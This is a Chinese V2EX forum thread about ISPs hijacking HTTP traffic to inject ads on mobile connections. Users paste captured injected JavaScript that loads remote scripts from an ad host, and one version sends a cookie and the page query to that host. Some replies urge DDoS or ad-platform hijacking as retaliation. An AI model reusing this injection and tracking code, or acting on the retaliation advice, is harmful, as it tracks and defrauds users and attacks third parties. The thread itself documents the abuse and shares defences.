V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
thetast
V2EX  ›  宽带症候群

现在流量劫持这么猖獗,貌似国家也没有管的意思,有曝光或者办法治治这种问题么?

  •  
  •   thetast · 2017-11-16 23:25:13 +08:00 · 9214 次点击
    这是一个创建于 2592 天前的主题,其中的信息可能已经有所发展或是发生改变。
    我自己用电信宽带、移动宽带、移动 4G 都出现了不同程度的流量劫持,而且现在只劫持手机,基本不劫持电脑。这让这种问题很头疼。
    至少今天深圳电信被我抓到了劫持 JS 的访问。专门用手机通过 Fiddler 来访问 HTTP 网站,果然抓到:

    源地址: http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811

    请求结果:

    var _atn_obj_ = new Object;
    _atn_obj_.oldurl = 'http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811';
    _atn_obj_.unified_url = 'http://ntx.quanliyouxi.cn:2525/adv_select/ad_unified_access?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPycjLz8fNz7/OyczRmJuDzs7J0c3L0cnL0c7LzYPOg87PzcfOzoPPg8+DiIiI0ZmThpqNi5qe0ZyQkoPOys7Px8vMzszJg82DzM/Pzw==';
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

    多个 JS 都出现了类似的现象。有了证据,而且对方也是流氓(投诉多次,发现根本没用),有没有什么流氓的办法治呢?
    34 条回复    2020-06-22 16:00:44 +08:00
    matolv
        1
    matolv  
       2017-11-16 23:37:21 +08:00   ❤️ 1
    流量劫持=GDP UP,曝光并没什么暖用,工信部表示规范市场全靠自觉,国家没有相关法律制裁此等行为。流氓办法就是 DDOS 直接打死
    pisser
        2
    pisser  
       2017-11-16 23:39:31 +08:00
    无解,取证困难,利益链深。
    changwei
        3
    changwei  
       2017-11-16 23:41:11 +08:00 via Android
    可以法庭起诉一波,估计能带来很大影响,,但是不知道有什么法律支持。
    yexm0
        4
    yexm0  
       2017-11-16 23:43:03 +08:00 via iPhone
    没有,而且深圳电信算是仁慈的了,深圳联通和移动连那些有名的 dns 地址也给你劫持掉的
    thetast
        5
    thetast  
    OP
       2017-11-16 23:43:41 +08:00
    @changwei 的确是有判例,但是取证方面的确很困难。

    @pisser 这的确是很痛苦的事情,VPN 可以治这个行为的又被禁用,所有加密行为均被禁止。

    @matolv 所以这个工信部和通讯管理局也是没办法?的确考虑过 DDoS

    今天在移动 4G 下发现流量直接劫持 302 到了 10.0.2.111
    thetast
        6
    thetast  
    OP
       2017-11-16 23:44:29 +08:00
    @yexm0 没错,移动还劫持了 DNS 地址。这个是很恶心的,NX DOMAIN 也是回来他们自己的页面。这的确很恶心。
    f2f2f
        7
    f2f2f  
       2017-11-16 23:47:37 +08:00
    提速降费
    羊毛出在羊身上
    thetast
        8
    thetast  
    OP
       2017-11-16 23:53:23 +08:00
    @f2f2f 提速? 200M 宽带上行 4M,降费?深圳电信的宽带貌似大多数时候都是要接近 2000 一年,一个月 160+。看看对面香港,再对面台湾,貌似这不是理由。
    感觉电信自己都不是很清楚这回事,要不就是有些人装傻了。
    qwvy2g
        9
    qwvy2g  
       2017-11-17 00:12:53 +08:00 via Android
    其实一直在想一个问题:以前看过有人用公司的网络挂挖币的设备,不知道运营商的家用宽带接入机房是怎么管理的?能否杜绝这种现象?
    phy25
        10
    phy25  
       2017-11-17 00:35:46 +08:00 via Android   ❤️ 2
    这东西就像个人信息泄露一样,反正问题没大到危害国家安全生命安全,就慢慢来。
    据说现在在准备运营商级别的「反劫持系统」检测劫持了。
    thetast
        11
    thetast  
    OP
       2017-11-17 01:00:36 +08:00
    @qwvy2g 这个应该性质不同。
    使用公司的网络挂挖币,如果公司是不允许这么做的,那么就应该算违反了公司使用网络的规定。
    而对于家用宽带流量劫持,由于运营商提供的是家用宽带,网络服务,在中间加了流量劫持,那么就算是对网络链路中的内容进行了探测和更改。
    GooMS
        12
    GooMS  
       2017-11-17 03:45:34 +08:00 via Android
    今年 18 大不就出了劫持的政策
    LuvF
        13
    LuvF  
       2017-11-17 08:43:16 +08:00
    工信部
    liyvhg
        14
    liyvhg  
       2017-11-17 08:59:29 +08:00 via Android   ❤️ 1
    劫持那个广告平台,重定向到轮子的网站,然后举报
    LanFomalhaut
        15
    LanFomalhaut  
       2017-11-17 09:41:45 +08:00   ❤️ 1
    每次看到这种话题 只想说 以暴制暴才是正道...什么投诉都是扯皮 临时几天白名单 又有何用..浪费时间精力 还影响心情: )
    f2f2f
        16
    f2f2f  
       2017-11-17 09:48:56 +08:00
    @f2f2f 那为啥当年 2000 一年 2M 就没听过劫持这种事呢?
    人家 ISP 从来就没想真给你省钱
    miaomiao888
        17
    miaomiao888  
       2017-11-17 10:56:06 +08:00
    所以我现在 10M 对等 有公网没各种劫持 懒的升不敢升 宽带商提示升级的电话也懒的接
    580a388da131
        18
    580a388da131  
       2017-11-17 11:05:41 +08:00
    没出什么幺蛾子,这种事情优先级不高,所以以后解决。
    sasalemma
        19
    sasalemma  
       2017-11-17 11:09:42 +08:00
    大内网特色。另 301 劫持也是正常,下载 cdn 加速都加速到自家的服务节点,对于强迫症来说,我就是要 idm 从原网站拖软件,只能在夜深人静的时候,还有 https 伺候。人一多,出国端口带宽不够就可以大内网加速,很忧伤,都不知道那些文件是不是造假的。没有数字签名也没有 sha1 对照的很忧伤。
    anheiyouxia
        20
    anheiyouxia  
       2017-11-17 11:12:01 +08:00 via Android
    @liyvhg 那到时候抓的就是你了😂
    可以参考 2014 年温州有线电视被黑事件
    jy02201949
        21
    jy02201949  
       2017-11-17 11:32:45 +08:00
    那是没碰到领导的底线,上次把国务院的劫持了曝光不到一天就紧急处理掉
    liyvhg
        22
    liyvhg  
       2017-11-17 11:43:30 +08:00 via Android
    @anheiyouxia 那就换个思路,打开某些政府网站,例如领导人简历页面,截图被插入广告的证据然后举报,之前 v2 好像有人这么搞过?
    0hey0
        23
    0hey0  
       2017-11-17 12:04:28 +08:00 via Android
    罪名:破坏公共计算机安全罪
    mytsing520
        24
    mytsing520  
       2017-11-18 11:43:21 +08:00
    接下来运营商会造管道级别的 CDN,大文件(主要是视频)运营商自己缓存,减少互联互通产生的流量成本(来自联通 CDN 白皮书)
    zhouyut001
        25
    zhouyut001  
       2017-11-20 08:17:18 +08:00 via Android
    @thetast 上传速度不是运营商说了算,国家的政策。你办理企业宽带就不会限制了
    thetast
        26
    thetast  
    OP
       2017-11-21 22:32:25 +08:00 via Android
    @zhouyut001 没觉得啊,不同城市不同,加上企业宽带也有限制啊
    thetast
        27
    thetast  
    OP
       2017-11-21 22:33:14 +08:00 via Android
    @mytsing520 CDN 没问题,如果 CDN 加速应该全世界都是有的。关键是劫持之后塞你自己的东西,那就太恶心了
    zhouyut001
        28
    zhouyut001  
       2017-11-22 15:15:46 +08:00 via Android
    @thetast 重庆电信企业或者学校的专线是对的网络
    Esded
        29
    Esded  
       2017-12-08 04:23:17 +08:00
    我这里是清远市,中国电信,两天宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
    还有在百度搜索的时候,打开其中搜索结果的页面,按返回时会跳到百度搜索用设定好的关键字进行搜索
    我相信这是大范围全省的劫持,有必要开个专门讨论 quanliyouxi.cn 广告问题的贴
    kio.quanliyouxi.cn183.59.53.189 3074110909 广东省梅州市 电信
    kio.quanliyouxi.cn183.59.53.187 3074110907 广东省梅州市 电信
    ntx.quanliyouxi.cn183.59.53.188 3074110908 广东省梅州市 电信
    ntx.quanliyouxi.cn121.15.207.243 2031079411 广东省 电信
    var _atn_obj_ = new Object;
    _atn_obj_.oldurl = 'http://js.t.sinajs.cn/open/thirdpart/js/pageapp/mobile/server.js?version=201606141500&cHVzaA=1512384756';
    _atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7Og8zPyM3OyM7Ly86gzc7Kz8uDrLLSuMbPz6+DzIPLy87Hz8+DzoPOys7NzMfLyMrJg87Kzs3Mx8vIysnPycbIz8zLg83NyMjJ';
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
    window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);

    function mycount_add_count(stype){
    var script=document.createElement("script");
    script.setAttribute("type", "text/javascript");
    var URL = "http://kio.quanliyouxi.cn:2525/feedback";
    var ck = getck("JSCOOKIEID");
    if(ck == ""){
    ck = "0";
    }
    var path = "";
    if (window.location.search == "")
    path = window.parent.location.search;
    else
    path = window.location.search;

    path=decodeURIComponent(path);
    path=path.replace(' ','+');
    if (path != "") {
    path = URL + path + "&stype="+stype;
    } else {
    path = URL;
    }
    path += "&ak="+ck;
    script.setAttribute("src", path);
    var heads = document.getElementsByTagName("head");
    if(heads.length)
    heads[0].appendChild(script);
    else
    document.documentElement.appendChild(script);
    }

    mycount_add_count(1);

    //关闭页面
    function closePage(){
    var userAgent = navigator.userAgent;
    if (userAgent.indexOf("Firefox") != -1 || userAgent.indexOf("Chrome") !=-1) {
    window.location.href="about:blank";
    } else {
    window.close();
    }
    }


    function getck(sname){//获取单个 cookies
    var acookie=document.cookie.split("; ");
    for(var i=0;i<acookie.length;i++){
    var arr=acookie[i].indexOf("=");
    if(arr > 0){
    var start = acookie[i].substring(0, arr);
    var end = acookie[i].substring(arr+1, acookie[i].length);
    if(sname==start){
    return end;
    }
    }else{
    return "";
    }
    if(sname==arr[0]){
    if(arr.length>1){
    return unescape(arr[1]);
    }else{

    }
    }
    }
    return "";
    }
    Esded
        30
    Esded  
       2017-12-08 04:24:08 +08:00
    我这里是清远市,中国电信,两条 宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
    a86913179
        31
    a86913179  
       2017-12-13 09:51:58 +08:00
    http 劫持要解决,需要 linux 类网关 iptables drop 掉,dns 劫持需要非 53 端口,自己找台 VPS 架一个。其实最好的方法是买台线路好的 VPS 能跑满带宽的,直接全局代理!
    thetast
        32
    thetast  
    OP
       2018-04-23 10:35:02 +08:00
    最后的解决——投诉工信部,提供实锤,刚开始还赖说不是深圳的广告,最后还是给屏蔽了。
    kevin860
        33
    kevin860  
       2018-05-25 06:01:35 +08:00
    @thetast 发现我的网页也有这种劫持,不知道这种劫持的原理是什么,是从哪一步开始劫持的

    出现这种网址在页面里
    http://183.59.53.202:3535/adv_select/ad_unified_access?SP=ABzs/PzoPOz8/Ig7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPyMvJycnNyL/OyczRmJuDzs7M0cbN0c7KxtHNzM+DzoPNz8zGzsqDz4PPg4yXnpGYl4rRhpCKj56G0Zycg87KzcjOxsfOyMuDzoPP
    worldtongfb
        34
    worldtongfb  
       2020-06-22 16:00:44 +08:00
    @kevin860 #33 今天发现这个问题, 深圳电信 http 会插入这个地址,方法就是返回内容的时候在 head 头插 script

    这种方法只能对付 http 网站,https 解不出来就不行了

    访问了下结果就是个标识 id,根据你的 ua 电脑上 js 会异常 其他的没影响,手极端估计就会跳广告了
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2713 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 08:29 · PVG 16:29 · LAX 00:29 · JFK 03:29
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.